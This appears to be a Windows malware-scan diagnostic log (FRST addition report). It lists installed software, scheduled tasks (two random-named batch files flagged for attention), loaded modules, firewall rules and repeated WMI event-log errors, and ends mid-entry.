7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Photoshop Lightroom 4.3 64-bit (HKLM\...\{D759947B-8C5A-4480-B0DB-FC391F061C85}) (Version: 4.3.1 - Adobe)
Ant Video downloader (Native messaging host) (HKLM-x32\...\{C7B24B38-A9D0-4F6D-A028-8C90DB8F2D85}) (Version: 3.1.24 - Ant.com)
Applian Network Monitor (3.0.8.1) (HKLM-x32\...\Applian Network Monitor) (Version: 3.0.8.1 - Applian Technologies)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
Blitzkrieg 2 (HKLM-x32\...\1207664013_is1) (Version: 2.1.0.14 - GOG.com)
Blitzkrieg Anthology (HKLM-x32\...\Blitzkrieg Anthology_is1) (Version:  - GOG.com)
Carmageddon: Reincarnation (HKLM-x32\...\Carmageddon: Reincarnation_is1) (Version:  - )
Chrome Token Signing (HKLM\...\{98F4FF09-5CAF-494A-A67F-C48081CCDF9C}) (Version: 1.0.6.485 - RIA) Hidden
DigiDoc3 Client (HKLM-x32\...\{188E6E99-CE30-4060-9CDF-E97ADFCB3CF4}) (Version: 3.13.3.1512 - RIA) Hidden
eID software (HKLM-x32\...\{d23663a7-6af7-4a3f-a7ec-458e9d3ac442}) (Version: 17.10.0.1757 - RIA)
Enable S3 for USB Device (HKLM-x32\...\Enable S3 for USB Device) (Version:  - )
EstEID Minidriver (HKLM\...\{C8FD6A29-41A0-49CB-AB5B-96598235E4FD}) (Version: 3.12.0.77 - RIA) Hidden
EstEID Shell Extension (HKLM\...\{BB120379-55D5-4774-8B4D-81D9DD16353C}) (Version: 3.13.3.1512 - RIA) Hidden
EstEID Shell Extension (HKLM-x32\...\{B5D2ABF7-F3B8-44A3-A10D-A15DEF2F644D}) (Version: 3.13.3.1512 - RIA) Hidden
FF Token Signing Uninstaller (HKLM-x32\...\{DE25D1DE-8D29-4C37-9C70-2EFFC87EEC64}) (Version: 17.10.0.1757 - RIA) Hidden
Firefox PKCS11 Loader (HKLM\...\{31C58AB3-490E-48A9-9B45-98DA934CACEA}) (Version: 3.12.1.1070 - RIA) Hidden
Fraps (HKLM-x32\...\Fraps) (Version:  - )
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version:  - GOG.com)
ID-card utility (HKLM-x32\...\{6C6BE759-429F-406D-9887-CA469A8287FA}) (Version: 3.12.9.1261 - RIA) Hidden
IE Token Signing Plugin (HKLM\...\{92C0E129-C2A7-44F3-955C-AE90D0916337}) (Version: 3.13.0.987 - RIA) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{619e726e-d2b4-4e28-9568-c964fd81ee6c}) (Version: 10.1.1.14 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.225 - Intel Corporation)
IrfanView 4.50 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.50 - Irfan Skiljan)
K-Lite Codec Pack 12.5.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.5.0 - KLCP)
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3154529) (HKLM\...\{5B71B4F6-A412-3C48-B332-0FA9B9958940}) (Version: 4.6.01081 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{CA8A885F-E95B-3FC6-BB91-F4D9377C7686}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
ModifyRegistry version 0.1 (HKLM-x32\...\{1D5BE6B5-7FD4-4A78-90F2-AF6B53BC8C1C}_is1) (Version: 0.1 - VIA Technologies, Inc.)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Morrowind Graphics Extender 3.3.2 (HKLM-x32\...\Morrowind Graphics Extender_is1) (Version:  - Timeslip)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0.1 - Mozilla)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.10 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 306.97 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 306.97 - NVIDIA Corporation)
NVIDIA Graphics Driver 306.97 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 306.97 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.18.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.18.0 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0604 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0604 - NVIDIA Corporation)
NVIDIA Update 1.10.8 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.10.8 - NVIDIA Corporation)
Open-EID Metapackage (HKLM-x32\...\{480CC672-1E8A-44B3-BF21-0A378662DD22}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID QtConf Uninstaller (HKLM-x32\...\{433CCE35-D98B-4ADA-B604-7DCEBC8B09A8}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID Uninstaller (HKLM-x32\...\{CFB5249C-8910-4154-A306-C43774C90530}) (Version: 17.10.0.1757 - RIA) Hidden
Open-EID Updater (HKLM-x32\...\{A60ADF43-9579-4670-93FC-6D23BD2A8F1C}) (Version: 3.12.2.1012 - RIA) Hidden
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.40 - VIA Technologies, Inc.) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.5 - Power Software Ltd)
Ralink RT2870 Wireless LAN Card (HKLM-x32\...\{28DA7D8B-F9A4-4F18-8AA0-551B1E084D0D}) (Version: 1.5.24.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Replay Media Catcher 6 (6.0.0.70) (HKLM-x32\...\Replay Media Catcher 6) (Version: 6.0.0.70 - Applian Technologies)
SafeZone Stable 1.51.2220.53 (HKLM-x32\...\SafeZone 1.51.2220.53) (Version: 1.51.2220.53 - Avast Software) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.14.0 - SAMSUNG Electronics Co., Ltd.)
Spintires v.03.03.16 (HKLM-x32\...\Spintires v.03.03.16_is1) (Version: Spintires v.03.03.16 - Darius)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.74.0.150 - Zemana Ltd.)
TeRa Client (HKLM\...\{3EC73B3C-9905-46C8-A654-2CBF0152A90A}) (Version: 1.0.0.219 - RIA) Hidden
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The 4Th Coming 1.72 (HKLM-x32\...\The 4Th Coming 1.72) (Version: 1.72 - DialSoft)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 6.61 - NCH Software)
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.40 - VIA Technologies, Inc.)
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 5.20 - NCH Software)
Windows Driver Package - RIA (Estonian National ID Card) (UMPass) SmartCard  (09/21/2017 3.12.0.77) (HKLM\...\0F673E6BE49AB7389244AD28CBFB79163DA20A7E) (Version: 09/21/2017 3.12.0.77 - RIA (Estonian National ID Card))
VLC media player (HKLM\...\VLC media player) (Version: 2.2.8 - VideoLAN)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers1: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2018-01-10] ()
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers1: [DigiDoc3ShellExtension] -> {310AAB39-76FE-401B-8A7F-0F578C5F6AB5} => C:\Program Files\Open-EID\EsteidShellExtension.dll [2017-10-24] (RIA)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2012-10-02] (NVIDIA Corporation)
ContextMenuHandlers6: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2018-01-10] ()
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-12-22] (AVAST Software)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2016-02-10] (Power Software Ltd)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09B877A5-E470-40D9-B8AA-2B741994CC08} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {13B7508E-9F15-46F3-8FCA-B08191E5A004} - System32\Tasks\SafeZone scheduled Autoupdate 1478538427 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {6C430DDE-4ADF-4922-B91E-872CCAC5D507} - System32\Tasks\PSEWDZ => C:\Users\Jahikas\oFIF.exe [2016-06-12] (Microsoft Corporation)
Task: {85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3} - System32\Tasks\SyHTyUPcnUkIY => C:\Program Files (x86)\bFmsiuYoOoOvL.bat [2009-07-14] () <==== ATTENTION
Task: {98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0} - System32\Tasks\hYOuioDYluo => C:\Windows\SysWOW64\hicAAmW.bat [2009-07-14] () <==== ATTENTION
Task: {9FAF999F-B1C0-4EB6-8FB8-E8D3FF1F251C} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [2018-01-06] (AVAST Software)
Task: {B1A3E979-9F87-468A-85BD-150518122937} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-12-22] (AVAST Software)
Task: {B59E3446-4F64-4481-835A-8D4A8FFA5FE0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-09] (Adobe Systems Incorporated)
Task: {CF60FBBC-E160-4749-B9B1-8A980ABEFE0D} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Jahikas\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.htm

==================== Loaded Modules (Whitelisted) ==============

2016-11-07 21:27 - 2012-10-02 21:51 - 000086888 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2018-01-10 03:37 - 2018-01-10 03:37 - 000155504 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
2016-11-07 16:48 - 2014-12-12 17:24 - 000044760 _____ () C:\Windows\runSW.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000067920 _____ () c:\Program Files\AVAST Software\Avast\x64\module_lifetime.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000067984 _____ () C:\Program Files\AVAST Software\Avast\x64\dll_loader.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000236840 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000902824 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000349568 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000337096 _____ () C:\Program Files\AVAST Software\Avast\x64\tasks_core.dll
2016-11-07 23:07 - 2016-11-07 23:07 - 002760704 _____ () C:\Program Files (x86)\The4ThComing\t4c.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000058016 _____ () C:\Program Files\AVAST Software\Avast\module_lifetime.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000057504 _____ () C:\Program Files\AVAST Software\Avast\dll_loader.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000206152 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000289272 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000196248 _____ () C:\Program Files\AVAST Software\Avast\network_notifications.dll
2018-01-10 21:15 - 2018-01-10 21:15 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011006\algo.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000745408 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000148936 _____ () C:\Program Files\AVAST Software\Avast\hns_tools.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000293944 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-07-05 07:40 - 2017-07-05 07:40 - 067109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-12-22 09:18 - 2017-12-22 09:18 - 000282560 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-11-07 16:34 - 2013-09-16 12:17 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-11-09 11:20 - 2015-10-24 19:00 - 003502592 _____ () C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1345210596-781569937-2744199837-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jahikas\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{6E89D580-3909-42D4-990C-8EC57310F6ED}] => (Allow) C:\PROGRA~2\REALTEK\USBWIR~1\RtWlan.exe
FirewallRules: [{D980AE09-1BCC-4438-8EA1-F149E7C47AE7}] => (Allow) LPort=1542
FirewallRules: [{2B6A94AA-899C-46EC-A9B3-ABC4EA37E4EB}] => (Allow) LPort=1542
FirewallRules: [{34D2E829-56AC-4DA5-8CAA-FF634AF5C495}] => (Allow) LPort=53
FirewallRules: [{ECC1DD69-8180-4766-B632-0F3E45DAB3A4}] => (Allow) C:\PROGRA~2\REALTEK\USBWIR~1\Rtldhcp.exe
FirewallRules: [{10575CE0-A8FA-4AA9-AF0F-455B6CBF02F4}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{BED1FA9A-13AB-4E2D-9702-F80BF58B3340}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{A5B0EB42-F37E-405E-A634-35FE31B60DB1}] => (Allow) LPort=53
FirewallRules: [{04E516BE-E325-4979-B3C5-BD5D0DD6C4A2}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{D193E981-9730-46FE-B812-0F7512DB38BC}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{ABD68125-C1D8-4406-A81F-E3ED01F25E87}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{CC284204-65F7-4F33-B1BC-888D7090C4BF}] => (Allow) C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe
FirewallRules: [{AFBE3B18-E923-49C9-AD50-0A7287C41912}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{FA5E0B69-71F7-4663-B4AE-CD2F6589027E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{9954E21B-B921-449D-AA09-580A7E644742}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B1089BEE-49E1-4163-97B8-75013617AE18}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{0FAA9E94-C4A8-496B-8C9D-11F21CCBD125}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{573A0AE5-30A1-4541-9DC8-11ED6C2D9287}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2D80F3F8-19C8-4C39-947E-A2E4173AF7F4}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{ADB2BE84-167B-40D0-BD2D-6D586E64AB7E}] => (Allow) C:\Users\Jahikas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2441EF7A-A683-4CC9-8C65-2151E892BE7E}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jrmcp.exe
FirewallRules: [{F1EA65E6-3EF5-404F-9AD1-A4E42744AB20}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jrmcp.exe
FirewallRules: [{3F51EC47-E54F-4BA6-9D32-ACA862A969CF}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jbp.exe
FirewallRules: [{4C48A25E-2900-4754-AEC6-1CACAF145387}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\jbp.exe
FirewallRules: [{8BE74C25-9CF4-4BCB-B47C-53E1FB017D1B}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\ffmpeg.exe
FirewallRules: [{9C3B1EB8-5926-482C-9F44-08DFAC462E90}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\ffmpeg.exe
FirewallRules: [{69AED78A-1AD1-4A84-99B6-2B3540A35624}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\dl.exe
FirewallRules: [{7F79B3F2-BD63-41F5-9799-79296A33CA24}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\dl.exe
FirewallRules: [{75690DC6-E1E4-40E6-9FA7-F5DA2D96005E}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\aria2c.exe
FirewallRules: [{0C9A931C-AEEA-421E-AD59-BEFA2BDE2380}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\aria2c.exe
FirewallRules: [{B8D60E08-3271-495C-BE1E-F56E7156C69A}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\qtCopy.exe
FirewallRules: [{AA6A8495-6618-43F8-A94D-B18A78FA8EF0}] => (Allow) C:\Program Files (x86)\Applian Technologies\Replay Media Catcher 6\qtCopy.exe
FirewallRules: [TCP Query User{BCF5A69E-2779-439D-AF3D-766724F9684D}D:\games\counter-strike cs 1.6 p47\hl.exe] => (Allow) D:\games\counter-strike cs 1.6 p47\hl.exe
FirewallRules: [UDP Query User{E3D6BECD-4D34-4AB1-9607-73F9D7834D2B}D:\games\counter-strike cs 1.6 p47\hl.exe] => (Allow) D:\games\counter-strike cs 1.6 p47\hl.exe
FirewallRules: [TCP Query User{6D2E162D-C600-4DF6-8D5E-47A16D647D6D}D:\games\spintires\spintires v.03.03.16\spintires.exe] => (Allow) D:\games\spintires\spintires v.03.03.16\spintires.exe
FirewallRules: [UDP Query User{EEDE19F0-0EE1-4A11-9BB2-9149CAAB3142}D:\games\spintires\spintires v.03.03.16\spintires.exe] => (Allow) D:\games\spintires\spintires v.03.03.16\spintires.exe
FirewallRules: [TCP Query User{8AC06605-2722-4181-8405-C2EA1510DF9C}D:\games\resident evil 6\bh6.exe] => (Block) D:\games\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{3B55B096-E13B-4698-A75A-C441D57C4257}D:\games\resident evil 6\bh6.exe] => (Block) D:\games\resident evil 6\bh6.exe
FirewallRules: [{53F1A585-3CAD-452E-86D6-FB23C1F935D8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{299C05B9-6175-471D-8494-C361CFC56A67}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{811A007E-AF7A-408F-9CBB-11D4BA7B223A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

10-01-2018 04:51:20 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2018 08:32:51 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 09:46:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 09:15:32 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:38:50 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:08:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 07:46:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:48:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:32:39 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:03:45 AM) (Source: WinMgmt) (EventID: 10) (User: )
